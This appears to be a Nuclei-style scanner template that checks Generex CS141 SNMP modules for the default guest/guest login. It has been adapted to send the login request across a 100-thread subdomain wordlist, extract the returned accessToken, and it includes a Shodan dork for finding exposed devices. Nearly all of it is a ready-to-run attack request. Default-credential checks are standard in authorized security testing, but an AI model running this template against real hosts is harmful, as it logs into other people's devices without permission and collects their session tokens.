id: cs141-default-login 3

info:
  name: CS141 SNMP Module Default Credentials
  author: socketz
  severity: medium
  reference: https://www.generex.de/media/pages/packages/documents/manuals/f65348d5b6-1628841637/manual_CS141_en.pdf
  tags: hiawatha,iot,default-login
#  additional-fields:
#    shodan-dork: https://www.shodan.io/search?query=html%3A%22CS141%22

requests:
  - payloads:
      Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt
    attack: sniper
    threads: 100

    raw:
      - |
        POST /api/login HTTP/1.1
        Host: {{Subdomains}}
        Accept: application/json, text/plain, */*
        Content-Type: application/json

        {"userName":"guest","password":"guest"}
    matchers-condition: and
    matchers:
      - type: word
        words:
          - 'accessToken'
          - 'application/json'
        condition: and
        part: header

      - type: status
        status:
          - 200

    extractors:
      - type: kval
        kval:
          - accessToken
